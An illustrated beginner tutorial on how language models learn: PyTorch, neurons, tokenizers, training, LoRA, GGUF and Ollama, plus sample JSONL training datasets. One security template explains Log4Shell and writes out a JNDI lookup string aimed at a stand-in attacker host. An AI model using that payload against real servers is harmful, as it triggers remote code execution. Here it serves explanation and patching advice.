Tutorial · ages 12+

How does an AI actually learn things?

A step-by-step tour of PyTorch, neural networks, training, the secret format Ollama uses, and how your typed question actually turns into an answer. No PhD required — middle-school math is enough.

12 chapters · ~30 min to read · 7 diagrams · 3 dataset templates

Chapter 01

What is PyTorch?

Imagine a really, really fast calculator. Not just one that adds two numbers — one that can multiply millions of numbers at once, AND remember every step it took. That's PyTorch. It's a free software library that runs on your computer and powers most of the AI you hear about.

PyTorch has two superpowers:

  1. Tensors. A tensor is just a grid of numbers — like a spreadsheet, but it can have more dimensions. A list is a 1-D tensor, a table is a 2-D tensor, a stack of tables is 3-D, and so on. AI models are made of millions of numbers organized into tensors.
  2. Autograd. The "remembering" part. When you do math on tensors, PyTorch secretly writes down every step. Later it can run those steps backwards to figure out how to improve — which is how AIs learn.
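To make both superpowers concrete, here is a toy, pure-Python imitation. It is not PyTorch's real code or API. The `shape` helper reports the dimensions of a nested-list "tensor", and the hypothetical `Value` class writes down every add and multiply so `backward()` can replay them in reverse. In real PyTorch the same idea starts with something like `torch.tensor(2.0, requires_grad=True)`.

```python
# Toy imitation of PyTorch's two superpowers (for intuition only;
# real PyTorch does this with fast C++/GPU code).

def shape(t):
    """Return the dimensions of a nested-list 'tensor', e.g. (2, 3) for a 2x3 table."""
    dims = []
    while isinstance(t, list):
        dims.append(len(t))
        t = t[0] if t else None
    return tuple(dims)


class Value:
    """A number that remembers how it was made, so the math can be run backwards."""

    def __init__(self, data, parents=()):
        self.data = data
        self.grad = 0.0              # filled in by backward()
        self._parents = parents      # the Values this one was computed from
        self._backward_fn = None     # how to pass the gradient to the parents

    def __add__(self, other):
        out = Value(self.data + other.data, (self, other))
        def backward_fn():
            # d(a+b)/da = 1 and d(a+b)/db = 1
            self.grad += out.grad
            other.grad += out.grad
        out._backward_fn = backward_fn
        return out

    def __mul__(self, other):
        out = Value(self.data * other.data, (self, other))
        def backward_fn():
            # d(a*b)/da = b and d(a*b)/db = a
            self.grad += other.data * out.grad
            other.grad += self.data * out.grad
        out._backward_fn = backward_fn
        return out

    def backward(self):
        # Put every recorded step in order, then replay them in reverse.
        order, seen = [], set()
        def visit(v):
            if id(v) not in seen:
                seen.add(id(v))
                for p in v._parents:
                    visit(p)
                order.append(v)
        visit(self)
        self.grad = 1.0
        for v in reversed(order):
            if v._backward_fn:
                v._backward_fn()


print(shape([1, 2, 3]))               # (3,)    a list is 1-D
print(shape([[1, 2, 3], [4, 5, 6]]))  # (2, 3)  a table is 2-D

w, x, b = Value(2.0), Value(3.0), Value(1.0)
y = w * x + b        # forward: 2*3 + 1 = 7
y.backward()         # backward: how much does y move if each input is nudged?
print(y.data, w.grad, x.grad, b.grad)  # 7.0 3.0 2.0 1.0
```

Each `grad` answers the question "if I nudge this number a little, how much does the output change?", which is exactly the information training needs.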

You don't have to write PyTorch code to use this project. The trainer container does all of that. But knowing what's happening inside helps everything else make sense.

Official PyTorch tutorial ↗
Chapter 02

How does a model actually "think"?

A neural network is built from tiny math units called neurons. A single neuron does something a 5th grader could do:

  1. Take some numbers as input (say, three numbers).
  2. Multiply each by a "weight" — a knob that the model gets to tune.
  3. Add them all up. Add one more number called a "bias."
  4. Run the result through a simple decision function (like: "if it's negative, make it zero").
  5. Spit out the result.

That's it. One neuron is dumb. But when you stack thousands of them in layers, and the output of one layer becomes the input of the next, magical things happen — the network learns to recognize cats in photos, translate French, or answer grocery questions.

Every "weight" is a number PyTorch stores in a tensor. The "135 million parameter model" we use? That's about 135 million of these numbers (weights plus biases, together called parameters), sitting in tensors, ready to be tuned.

[Diagram: a single neuron. Inputs x₁, x₂, x₃ are multiplied by weights w₁, w₂, w₃, added up (Σ), and passed through an activation (ReLU, sigmoid…) to give the output y.]

y = activation(w₁·x₁ + w₂·x₂ + w₃·x₃ + b)
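The five neuron steps fit in a few lines of Python. This is a minimal sketch with made-up inputs and weights, using ReLU as the decision function:

```python
def relu(z):
    """ReLU activation: negative numbers become 0, positive ones pass through."""
    return max(0.0, z)

def neuron(inputs, weights, bias):
    """One artificial neuron: multiply, add up, add the bias, then activate."""
    total = sum(x * w for x, w in zip(inputs, weights))  # steps 2-3: multiply and add up
    total += bias                                        # step 3: add the bias
    return relu(total)                                   # steps 4-5: decide and output

# Made-up knob settings, just for illustration.
print(neuron([1.0, 2.0, 3.0], [0.5, 1.0, 0.25], bias=0.5))   # 3.75
print(neuron([1.0, 2.0, 3.0], [0.5, -1.0, 0.25], bias=0.5))  # 0.0 (the sum was negative)
```

Training never changes `inputs`; it only tunes `weights` and `bias`.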
Chapter 03

The math, made simple.

Three things to know. That's it.

MATH IDEA #1

Multiply & add

Every layer of a model is mostly just multiplication-and-adding. Lots of it.

inputs:  [1, 2, 3]
weights: [4, 5, 6]
output = 1×4 + 2×5 + 3×6
       = 4 + 10 + 18
       = 32

This is called a "dot product." A neural network does millions of these per second.
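Here is the same dot product in Python, plus a hypothetical `layer` helper showing that a whole layer is just one dot product per neuron (biases and activations are left out to keep it short):

```python
def dot(a, b):
    """Dot product: multiply matching positions, then add everything up."""
    assert len(a) == len(b), "both lists need the same length"
    return sum(x * y for x, y in zip(a, b))

def layer(inputs, weight_rows):
    """A layer is many dot products: one row of weights per neuron."""
    return [dot(inputs, row) for row in weight_rows]

print(dot([1, 2, 3], [4, 5, 6]))          # 32, same as the worked example
print(layer([1, 2, 3], [[4, 5, 6],         # neuron 1
                        [1, 0, -1]]))      # neuron 2  ->  [32, -2]
```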

MATH IDEA #2

Activation: yes/no/maybe

After the sum, the result goes through an "activation function" that decides if the neuron speaks up.

[Diagram: graph of ReLU, y = max(0, x)]

This one is called ReLU. If x is negative, output 0. If positive, pass it through. Simple, but it's the workhorse of modern AI.
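A quick side-by-side of ReLU and sigmoid (the other activation named in the neuron diagram), as a plain-Python sketch:

```python
import math

def relu(x):
    """ReLU: negatives become 0, positives pass through unchanged."""
    return max(0.0, x)

def sigmoid(x):
    """Sigmoid: squashes any number into the range 0..1, a softer 'maybe'."""
    return 1.0 / (1.0 + math.exp(-x))

for x in [-2.0, -0.5, 0.0, 0.5, 2.0]:
    print(f"x={x:+.1f}  relu={relu(x):.2f}  sigmoid={sigmoid(x):.2f}")
```

ReLU is popular partly because it is so cheap: one comparison, no exponentials.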

MATH IDEA #3

Roll downhill

Training is just: which way should I tweak the knobs to make the answer better?

[Diagram: the "loss" goes down with each step]

PyTorch's autograd computes the slope automatically. The optimizer takes one small step downhill. Repeat thousands of times → the model learns.
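A minimal sketch of "rolling downhill" with a single knob. The loss is a made-up valley, `(w - 3)²`, and the slope is estimated numerically by nudging `w` a tiny bit each way; autograd would compute the exact slope instead. The update `w -= learning_rate * slope` is plain gradient descent.

```python
def loss(w):
    """A made-up loss: a valley whose lowest point is at w = 3."""
    return (w - 3.0) ** 2

def slope(f, w, eps=1e-6):
    """Estimate the slope by nudging w a little each way (autograd does this exactly)."""
    return (f(w + eps) - f(w - eps)) / (2 * eps)

w = 0.0              # start somewhere on the hill
learning_rate = 0.1  # how big each downhill step is
for step in range(50):
    w -= learning_rate * slope(loss, w)   # step against the slope = downhill
    if step % 10 == 0:
        print(f"step {step:2d}: w = {w:.4f}, loss = {loss(w):.6f}")

print(f"final w = {w:.3f}")   # very close to 3, the bottom of the valley
```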

Chapter 04

Words → numbers: meet the tokenizer.

Models can't read English. They can only do math. So before any text reaches the model, a piece of code called the tokenizer chops it into pieces and replaces each piece with a number.

The pieces aren't always whole words. Common words get one number; rare words get split. "unbelievable" might split into "un" + "believ" + "able" — three tokens. Each token has an ID from a fixed "vocabulary" (usually around 32,000 – 200,000 entries).
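To see how a word can break into pieces like that, here is a toy tokenizer with a tiny made-up vocabulary (the IDs are invented too). It uses greedy longest-match, always grabbing the longest known piece at the front of the word. That is simpler than the merge rules a real BPE tokenizer learns, so treat it as an illustration of the idea, not of any real model's tokenizer.

```python
# Hypothetical mini-vocabulary; real ones have tens of thousands of entries.
# Single letters act as a fallback so any word made of them can be split.
VOCAB = {"un": 0, "believ": 1, "able": 2, "store": 3, "herbs": 4,
         "u": 5, "n": 6, "b": 7, "e": 8, "l": 9, "i": 10, "v": 11, "a": 12}

def tokenize(word, vocab):
    """Greedy longest-match: repeatedly take the longest vocab piece at the front."""
    pieces = []
    i = 0
    while i < len(word):
        for end in range(len(word), i, -1):   # try the longest piece first
            if word[i:end] in vocab:
                pieces.append(word[i:end])
                i = end
                break
        else:
            raise ValueError(f"no vocabulary piece matches {word[i:]!r}")
    return pieces

pieces = tokenize("unbelievable", VOCAB)
print(pieces)                       # ['un', 'believ', 'able']
print([VOCAB[p] for p in pieces])   # [0, 1, 2]
```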

This is also why we say things like "this model has a 2,048-token context": that's how many tokens it can pay attention to at once.

[Diagram: your message "How do I store herbs?" goes into the tokenizer (BPE), which splits it into the tokens How | do | I | store | herbs | ? and swaps each for a token ID: 2437, 466, 358, 3637, 28435, 30. Those numbers go into the model. A peek at the vocabulary: 2437 → "How", 466 → " do", 358 → " I", 3637 → " store", 28435 → " herbs". (Token IDs shown are illustrative.)]
Chapter 05

The training loop: how it actually learns.

Four steps, repeated thousands of times. That's all training is.

[Diagram: the training loop, repeated ×N: 1. Forward (predict an answer) → 2. Loss (how wrong were we?) → 3. Backward (which knobs caused it?) → 4. Update (tweak the weights) → back to 1.]

1. Forward

Show the model one training example and let it guess. For us, that's a question like "How do I pick a ripe avocado?" plus its answer; at every position, the model predicts which token should come next.

2. Loss

Compare its guesses to the correct answer in our dataset. The loss is a single number: bigger if the model thought the right tokens were unlikely, smaller if it was close.

3. Backward

PyTorch's autograd walks backwards through every step, computing how much each weight contributed to the error. This is the "gradient."

4. Update

The optimizer (we use Adam) nudges each weight a tiny bit in the direction that reduces the loss. Just a little — too big a nudge and we overshoot.
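The four steps can be sketched in plain Python on a toy problem: learning the rule y = 2x + 1 from six examples. To keep it short, this sketch uses one weight and one bias instead of millions, squared error as the loss, hand-derived slopes instead of autograd, and plain gradient descent instead of Adam.

```python
import random

# Hypothetical toy task: learn y = 2x + 1 from a handful of examples.
random.seed(0)
data = [(x, 2 * x + 1) for x in [-2.0, -1.0, 0.0, 1.0, 2.0, 3.0]]

w, b = random.uniform(-1, 1), random.uniform(-1, 1)   # the knobs start random
lr = 0.05                                             # size of each nudge

for epoch in range(200):
    for x, target in data:
        # 1. Forward: make a prediction.
        pred = w * x + b
        # 2. Loss: how wrong were we? (squared error)
        loss = (pred - target) ** 2
        # 3. Backward: slope of the loss for each knob (worked out by hand;
        #    PyTorch's autograd would compute these automatically).
        grad_w = 2 * (pred - target) * x
        grad_b = 2 * (pred - target)
        # 4. Update: nudge each knob a little bit downhill.
        w -= lr * grad_w
        b -= lr * grad_b

print(f"learned w = {w:.3f}, b = {b:.3f}, last loss = {loss:.6f}")  # near w = 2, b = 1
```

Making `lr` much larger is an easy way to watch the "overshoot" problem happen.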

Chapter 06

LoRA — teaching old models new tricks, cheaply.

Here's a problem: our model has 135 million weights. Training all of them takes a lot of memory and time. And we only have 65 examples — not nearly enough to retrain the whole thing without breaking what it already knows.

LoRA (Low-Rank Adaptation) is the trick. Instead of changing the millions of original weights, we:

  1. Freeze the entire base model. Nothing changes.
  2. Add a small "side patch" — two tiny matrices that get multiplied together — alongside certain parts of the model.
  3. Train only those tiny matrices. Maybe 700,000 numbers instead of 135 million.
  4. When we're done, mathematically merge the side patch back into the original weights. The result is a single normal model that's been gently steered toward our task.

It's like teaching a Michelin-starred chef one new dish — you don't send them back to culinary school. You just show them the recipe.

Original LoRA paper ↗
[Diagram: BASE MODEL · 135M weights · ❄ FROZEN, plus a LoRA adapter with ~700K trainable weights (0.5%) → merge into base → final model]
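Here is the LoRA arithmetic as a small plain-Python sketch. The merge follows W_merged = W + (alpha / r) · B·A, the scaling described in the LoRA paper and used by PEFT by default. The 576×576 matrix size and rank 8 are illustrative assumptions, not this project's actual settings.

```python
def matmul(A, B):
    """Multiply two matrices stored as lists of rows."""
    return [[sum(a * b for a, b in zip(row, col)) for col in zip(*B)] for row in A]

def lora_merge(W, B, A, alpha, r):
    """Merge a LoRA patch into frozen weights: W + (alpha / r) * (B @ A)."""
    scale = alpha / r
    BA = matmul(B, A)
    return [[w + scale * d for w, d in zip(w_row, d_row)]
            for w_row, d_row in zip(W, BA)]

# Trainable numbers for ONE square weight matrix (sizes are assumptions).
d, r = 576, 8
full = d * d            # training the whole matrix
lora = d * r + r * d    # training only B (d x r) and A (r x d)
print(full, lora, f"{lora / full:.1%}")   # 331776 9216 2.8%

# Tiny worked example: a frozen 3x3 matrix plus a rank-1 patch.
W = [[1, 0, 0],
     [0, 1, 0],
     [0, 0, 1]]
B = [[1], [0], [2]]      # 3 x 1, learned
A = [[0.5, 0, 0]]        # 1 x 3, learned
print(lora_merge(W, B, A, alpha=1, r=1))  # [[1.5, 0.0, 0.0], [0.0, 1.0, 0.0], [1.0, 0.0, 1.0]]
```

The savings shown are per patched matrix. LoRA usually patches only some of a model's matrices, so the trainable share of the whole model ends up smaller still, consistent with the ~0.5% figure above.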
Chapter 07

From PyTorch to Ollama: the GGUF format.

After training, the model is saved in the standard Hugging Face layout, which is a bunch of files: weights in .safetensors, settings in config.json, and the tokenizer in a few JSON files of its own. That's fine for Python, but Ollama wants something simpler: one file with everything in it.

That format is called GGUF (it stands for "GGML Universal Format", a bit of an acronym sandwich). Think of it like zipping a complicated folder of files into a single ZIP. Plus, GGUF can store the numbers at lower precision (a trick called quantization), which makes the model smaller to store and faster to load, especially on regular computers without expensive GPUs.

We use a tool called llama.cpp (a famous open-source project) to do the conversion. One Python command, one file out.

BEFORE — PyTorch format
output/merged/
├── config.json
├── model.safetensors  (260 MB)
├── tokenizer.json
├── tokenizer_config.json
└── special_tokens_map.json

5 files · ~270 MB total
AFTER — GGUF
output/
└── grocery-slm.gguf   (270 MB)

1 file · everything inside

Tokenizer, weights, settings — all baked in.
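Where does "everything inside" live? A GGUF file starts with a small header, followed by metadata key/value pairs (tokenizer, settings) and then the tensors. This minimal sketch reads only the header, assuming the little-endian layout from the GGUF spec for versions 2 and 3: the 4 magic bytes `GGUF`, a uint32 version, a uint64 tensor count, and a uint64 metadata count.

```python
import struct

def read_gguf_header(data: bytes) -> dict:
    """Parse the fixed-size start of a GGUF file (assumes the v2/v3 little-endian layout)."""
    if data[:4] != b"GGUF":
        raise ValueError("not a GGUF file (magic bytes don't match)")
    # "<IQQ" = little-endian uint32, uint64, uint64, starting right after the magic.
    version, n_tensors, n_kv = struct.unpack_from("<IQQ", data, 4)
    return {"version": version, "tensor_count": n_tensors, "metadata_kv_count": n_kv}

# Demo with fake header bytes (the counts are made up).
# For a real file you could read the first 24 bytes:
#   with open("output/grocery-slm.gguf", "rb") as f:
#       print(read_gguf_header(f.read(24)))
fake = b"GGUF" + struct.pack("<IQQ", 3, 272, 25)
print(read_gguf_header(fake))
```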

The Modelfile — Ollama's recipe card

A GGUF already holds the weights, tokenizer, and settings, but Ollama still needs to be told how to talk to the model. That's the job of a Modelfile: a tiny text file with simple instructions.

# Where to find the weights
FROM ./grocery-slm.gguf

# How to format messages before the model sees them
TEMPLATE """{{ if .System }}<|im_start|>system
{{ .System }}<|im_end|>
{{ end }}<|im_start|>user
{{ .Prompt }}<|im_end|>
<|im_start|>assistant
"""

# Generation knobs
PARAMETER temperature 0.6
PARAMETER top_p 0.9

# The personality (system prompt)
SYSTEM """You are GroceryGPT..."""

FROM

Points to the GGUF file with the weights. The starting line.

TEMPLATE

The exact text format the model expects. Different model families use different special tokens.

PARAMETER

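Generation knobs: temperature (how adventurous the word choices are), top_p (only sample from the most likely tokens whose probabilities add up to p), num_ctx (context window size, in tokens).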

SYSTEM

A hidden message sent before every conversation. Sets the personality.
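To see what the TEMPLATE in the Modelfile produces, here is a Python imitation of it. Ollama really fills templates with Go's template engine; this hypothetical `render_chatml` function only mirrors that one template. The model's job is to keep writing after the final `assistant` line.

```python
def render_chatml(prompt, system=None):
    """Mimic the Modelfile TEMPLATE: optional system turn, user turn, open assistant turn."""
    text = ""
    if system:                                   # {{ if .System }} ... {{ end }}
        text += f"<|im_start|>system\n{system}<|im_end|>\n"
    text += f"<|im_start|>user\n{prompt}<|im_end|>\n"
    text += "<|im_start|>assistant\n"            # the model continues from here
    return text

print(render_chatml("How do I store herbs?", system="You are GroceryGPT..."))
```

The special markers such as `<|im_start|>` only work if they match what the model saw during training, which is why different model families need different templates.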

Full Modelfile reference ↗
Chapter 08

End to end: what happens when you click "send"?

[Diagram: browser → nginx (proxy) → ollama → model
① POST /api/chat with { "messages": [...] }
② forwarded as-is
③ tokenize → run → generate (attention layers · softmax · sample)
④ one token at a time
⑤ NDJSON chunks
⑥ painted as they arrive]

The key word here is streaming. The model writes its answer one token at a time. We don't wait for the whole thing — each token gets sent back to your screen immediately. That's why answers feel like they're being typed.
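A minimal sketch of reading that stream, assuming Ollama's NDJSON chat format: each line is one JSON object whose `message.content` holds the next piece of text, and the last line has `"done": true`. The URL uses Ollama's default port 11434 and the model name `grocery-slm` is a hypothetical placeholder; in this project the browser talks to nginx instead, so the real path may differ.

```python
import json
import urllib.request

def iter_chat_tokens(lines):
    """Yield text pieces from NDJSON lines (one JSON object per line)."""
    for raw in lines:
        line = raw.strip()
        if not line:
            continue                          # skip blank lines
        chunk = json.loads(line)
        piece = chunk.get("message", {}).get("content", "")
        if piece:
            yield piece
        if chunk.get("done"):
            break                             # the last chunk also carries timing stats

def stream_chat(messages, url="http://localhost:11434/api/chat", model="grocery-slm"):
    """Hypothetical client: POST the chat and print each piece the moment it arrives."""
    body = json.dumps({"model": model, "messages": messages, "stream": True}).encode()
    req = urllib.request.Request(url, data=body, headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req) as resp:     # iterating resp yields byte lines
        for piece in iter_chat_tokens(line.decode("utf-8") for line in resp):
            print(piece, end="", flush=True)
    print()

# Offline demo with made-up chunks in the same shape:
sample = [
    '{"message": {"role": "assistant", "content": "Wrap"}, "done": false}',
    '{"message": {"role": "assistant", "content": " them"}, "done": false}',
    '{"message": {"role": "assistant", "content": " loosely."}, "done": false}',
    '{"message": {"role": "assistant", "content": ""}, "done": true}',
]
print("".join(iter_chat_tokens(sample)))   # Wrap them loosely.
```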

Chapter 09

How does the model pick the next word?

Softmax, in three minutes.

After all the math, the model spits out a list of raw scores — one for every possible next token (around 49,000 of them). These are called logits. They're not probabilities yet — just preferences.

To turn them into probabilities, we use a function called softmax. It does two things:

  1. Pushes bigger scores way up and smaller scores way down (exponentially).
  2. Scales everything so it adds up to 1.0 — like a percentage.

Then we don't always pick the highest one. That would be boring and repetitive. Instead we sample: roll dice weighted by the probabilities. The "temperature" parameter controls how spiky vs flat those probabilities are. Low temperature = almost always pick the favorite. High temperature = more variety, more risk of nonsense.

[Diagram: after "How do I store", the model sees LOGITS (raw scores): herbs 8.2, food 7.5, meat 5.1, bikes 1.0. Softmax turns them into PROBABILITIES (sum = 1.0): herbs 0.65, food 0.32, meat 0.03, bikes ~0. Sampling (rolling weighted dice) picks "herbs" this time; temperature controls how spiky or flat the dice are. ↻ Now the input is "How do I store herbs", and this repeats until the model outputs the special "end" token.]
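Here is softmax with temperature, a top_p filter, and weighted sampling in plain Python, using the four scores from the diagram. It is a sketch of the standard techniques; Ollama's real sampler has more options and may differ in the details.

```python
import math
import random

def softmax(logits, temperature=1.0):
    """Turn raw scores (logits) into probabilities that add up to 1."""
    scaled = [z / temperature for z in logits]   # low T: spikier, high T: flatter
    biggest = max(scaled)                        # subtracting the max avoids overflow
    exps = [math.exp(z - biggest) for z in scaled]
    total = sum(exps)
    return [e / total for e in exps]

def top_p_filter(tokens, probs, p=0.9):
    """Keep the most likely tokens until their probabilities reach p, then renormalize."""
    ranked = sorted(zip(tokens, probs), key=lambda pair: pair[1], reverse=True)
    kept, running = [], 0.0
    for tok, prob in ranked:
        kept.append((tok, prob))
        running += prob
        if running >= p:
            break
    total = sum(prob for _, prob in kept)
    return [tok for tok, _ in kept], [prob / total for _, prob in kept]

def sample(tokens, probs, rng=random):
    """Roll weighted dice: likelier tokens come up more often."""
    return rng.choices(tokens, weights=probs, k=1)[0]

tokens = ["herbs", "food", "meat", "bikes"]
logits = [8.2, 7.5, 5.1, 1.0]   # the raw scores from the diagram

# At temperature 1.0 this matches the diagram: [0.65, 0.32, 0.03, 0.0]
for t in (0.5, 1.0, 2.0):
    print(f"temperature {t}:", [round(p, 2) for p in softmax(logits, temperature=t)])

kept_tokens, kept_probs = top_p_filter(tokens, softmax(logits), p=0.9)
print("after top_p 0.9:", kept_tokens)          # ['herbs', 'food']
print("picked:", sample(kept_tokens, kept_probs, rng=random.Random(42)))
```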
Chapter 10

Teach it something new — your own dataset.

The whole system is dataset-shaped. Swap out data/dataset.jsonl, retrain, and you've got a completely different specialist. Here are three real templates to start from.

The format, always

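One example per line. Each line is a JSON object with a messages array. Two roles: user (the question) and assistant (the perfect answer you wish the model would give). The example below is spread over several lines for readability; in the real file each example must sit on a single line, like the templates further down.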

{"messages": [
  {"role": "user",      "content": "..."},
  {"role": "assistant", "content": "..."}
]}

Aim for 50+ diverse examples to start. More is better, but quality > quantity. Real, varied, accurate examples beat 1,000 copy-pasted near-duplicates every time.
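Because one broken line can quietly drop an example, it is worth checking the file before training. Here is a small validator sketch; the rules it enforces (valid JSON, a non-empty `messages` array, at least one user and one assistant turn, text content) are assumptions based on the format above, not the trainer's actual checks.

```python
import json

def check_dataset(lines):
    """Return a list of (line_number, problem) pairs for a chat-style JSONL dataset."""
    problems = []
    for n, line in enumerate(lines, start=1):
        if not line.strip():
            continue                                   # ignore blank lines
        try:
            example = json.loads(line)
        except json.JSONDecodeError as err:
            problems.append((n, f"invalid JSON: {err.msg}"))
            continue
        messages = example.get("messages") if isinstance(example, dict) else None
        if not isinstance(messages, list) or not messages:
            problems.append((n, 'missing a non-empty "messages" array'))
            continue
        roles = [m.get("role") if isinstance(m, dict) else None for m in messages]
        if "user" not in roles or "assistant" not in roles:
            problems.append((n, "needs at least one user and one assistant message"))
        if any(not (isinstance(m, dict) and isinstance(m.get("content"), str)) for m in messages):
            problems.append((n, 'every message needs a text "content"'))
    return problems

# Demo: line 2 is the first line of a pretty-printed example, which is not valid on its own.
demo = [
    '{"messages": [{"role": "user", "content": "Hi"}, {"role": "assistant", "content": "Hello!"}]}',
    '{"messages": [',
    '{"messages": []}',
]
for n, problem in check_dataset(demo):
    print(f"line {n}: {problem}")

# For the real file (path taken from this tutorial):
#   with open("data/dataset.jsonl", encoding="utf-8") as f:
#       print(check_dataset(f))
```

When generating lines from code, `json.dumps(example)` escapes newlines as `\n` and keeps each example on one line.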


Template A — Code snippets

For making a coding assistant. Each example is a programming question and a clean, runnable solution.

{"messages":[{"role":"user","content":"How do I read a file line by line in Python?"},{"role":"assistant","content":"Use a context manager — it auto-closes the file:\n\n```python\nwith open('file.txt') as f:\n    for line in f:\n        print(line.rstrip())\n```\n\nThis streams one line at a time, so it works on huge files."}]}
{"messages":[{"role":"user","content":"Reverse a string in JavaScript."},{"role":"assistant","content":"```javascript\nconst reversed = str.split('').reverse().join('');\n```\n\nSplit into characters, reverse the array, join back. Note: this breaks on emoji and some Unicode — use Array.from(str) for those."}]}
{"messages":[{"role":"user","content":"What's the difference between let and const in JS?"},{"role":"assistant","content":"`const` means you can't reassign the variable. `let` means you can. Both are block-scoped (unlike var). Default to const; use let only when you genuinely need to reassign."}]}
Where to find data

Your own commits, Stack Overflow Q&A, public docs of libraries you love. Pair each question with a tested answer.

Pitfalls

Escape newlines properly (\n) — invalid JSON will silently skip lines. Use the same code-fence style (```python) everywhere.

Bonus tip

Include a couple of "explain this" examples too, not just code generation. They help the model talk about code, not just write it.


Template B — Security & network knowledge

For a security/networking helper. Ports, protocols, CVEs, common attacks, headers — concise, accurate, citable.

{"messages":[{"role":"user","content":"What's the default port for SSH?"},{"role":"assistant","content":"SSH uses TCP port 22 by default, assigned by IANA. Many admins move it to a non-standard port to reduce noisy scans — that's security through obscurity, not real protection. Real protection comes from key-based auth and disabling password login."}]}
{"messages":[{"role":"user","content":"What is CVE-2021-44228?"},{"role":"assistant","content":"Log4Shell: a critical remote code execution flaw in Apache Log4j 2 (affected releases start at 2.0-beta9; check the NVD entry for the exact fixed versions). Attackers can trigger it by getting a vulnerable app to log a crafted string like ${jndi:ldap://attacker.com/x}. CVSS score: 10.0. Fix: upgrade to a current Log4j 2 release (2.17.1 or later on Java 8). The old workaround log4j2.formatMsgNoLookups=true is not considered a sufficient mitigation."}]}
{"messages":[{"role":"user","content":"Explain the X-Frame-Options HTTP header."},{"role":"assistant","content":"X-Frame-Options tells browsers whether your page can be embedded in an <iframe> on other sites. Values: DENY (never), SAMEORIGIN (only your own site), or ALLOW-FROM uri (deprecated). It prevents clickjacking. Modern alternative: Content-Security-Policy frame-ancestors directive, which is more flexible."}]}
{"messages":[{"role":"user","content":"What does a SYN flood attack do?"},{"role":"assistant","content":"It exploits the TCP 3-way handshake. The attacker sends many SYN packets but never replies to the SYN-ACK. The target's connection table fills with half-open connections, eventually refusing legitimate traffic. Mitigations: SYN cookies (defer state allocation until ACK arrives), connection rate limits, and proper firewall rules."}]}
Where to find data

NIST NVD (CVE database), MITRE ATT&CK, RFC documents, OWASP cheat sheets. All free and authoritative.

Pitfalls

Accuracy matters more here than anywhere — wrong CVE details could mislead someone in a real incident. Verify every answer.

Bonus tip

Add a system-prompt rule: "If you're not sure, say so." Small models will confidently invent CVEs otherwise.


Template C — Log file interpretation

For a log-whisperer. Paste an obscure log line, get a plain-English explanation and likely causes.

{"messages":[{"role":"user","content":"What does this mean?\n2024-03-15 14:22:01 ERROR [pool-1-thread-3] com.app.UserService - Failed to authenticate user: java.sql.SQLException: Connection timeout after 30000ms"},{"role":"assistant","content":"A Java app (UserService) tried to look up a user in a database to authenticate them, but the database query timed out after 30 seconds. Most likely causes:\n\n1. The database is down or unreachable.\n2. Connection pool exhausted — all connections in use.\n3. A slow query is holding locks.\n4. Network issue between app and DB.\n\nCheck DB status first, then connection pool metrics, then query logs."}]}
{"messages":[{"role":"user","content":"Nginx log: 192.168.1.5 - - [12/Mar/2024:10:14:33 +0000] \"GET /api/users HTTP/1.1\" 404 312 \"-\" \"curl/7.81.0\""},{"role":"assistant","content":"An Nginx access log entry. Breaking it down:\n• 192.168.1.5 — client IP\n• 12/Mar/2024:10:14:33 — timestamp\n• GET /api/users — request method + path\n• 404 — status code: resource not found\n• 312 — bytes sent in response body\n• curl/7.81.0 — User-Agent (someone using curl, not a browser)\n\nThe 404 means /api/users doesn't exist on this server. Check your route config or if the request should go to a different upstream."}]}
{"messages":[{"role":"user","content":"systemd: 'sshd.service: Main process exited, code=killed, status=9/KILL'"},{"role":"assistant","content":"The SSH daemon (sshd) was killed by signal 9 (SIGKILL). Signal 9 is uncatchable: something forcibly terminated it. Common causes:\n\n1. The system ran out of memory and the kernel's OOM killer chose sshd.\n2. Someone ran `kill -9` manually.\n3. A misbehaving init script.\n\nCheck `dmesg | grep -i oom` for memory pressure, and `journalctl _COMM=systemd` around the timestamp for context."}]}
Where to find data

Your own logs (redact PII!) — nginx, syslog, application logs. Public dataset: LogHub has labeled samples.

Pitfalls

Strip secrets, IPs, usernames, real CVE IDs from your own logs before training. Models can leak training data verbatim.

Bonus tip

Cover multiple log formats — nginx, systemd, JSON-structured logs, stack traces. Each looks different.

The 5-step workflow for your own dataset

  1. Write 50–100 example Q&A pairs in JSONL using one of the templates above.
  2. Save as data/dataset.jsonl (overwrite the grocery one).
  3. Optionally rewrite the SYSTEM line in Modelfile to match the new persona.
  4. Run docker compose --profile train run --rm trainer (takes 5–15 min on CPU).
  5. Run docker compose restart ollama-init and try your new model.
Chapter 11

The toolkit — every piece, what it does.

[Diagram: the stack, all running on CPU (your laptop): PyTorch · Transformers (Hugging Face) · PEFT (LoRA) · llama.cpp (GGUF conversion) · Ollama (the server) · Nginx (proxy + static files) · your browser → the chat UI]

PyTorch

pytorch.org ↗

The math engine. Defines the tensors, runs the forward + backward pass, and lets PEFT bolt LoRA onto the model.

Hugging Face Transformers

docs ↗

A library that wraps PyTorch with model-specific knowledge. Knows the architecture of SmolLM2 (and dozens of others), how to tokenize for it, and how to load weights from the Hugging Face Hub.

PEFT

docs ↗

"Parameter Efficient Fine-Tuning." Implements LoRA. A short config (a LoraConfig plus one call to get_peft_model) is enough to freeze the base model and add tiny trainable adapters.

llama.cpp

github ↗

A famous open-source project that made running LLMs on ordinary CPUs practical. We use its Python converter to turn the trained weights into a single GGUF file.

Ollama

The "Docker for LLMs." Loads GGUF files, manages models, and serves a simple HTTP API for chat. Auto-detects whether to use GPU or CPU.

Docker + Compose

docs ↗

Packages every service (trainer, ollama, init, web UI) into containers so it runs the same on any computer. docker compose up brings the whole stack online.

Nginx

A web server. We use it for two things: serving the HTML chat page and proxying API requests to Ollama (which avoids CORS pain).

Chapter 12

Keep learning.

The best free resources to go further. All of these are written by the people who built the things.

Deeper dive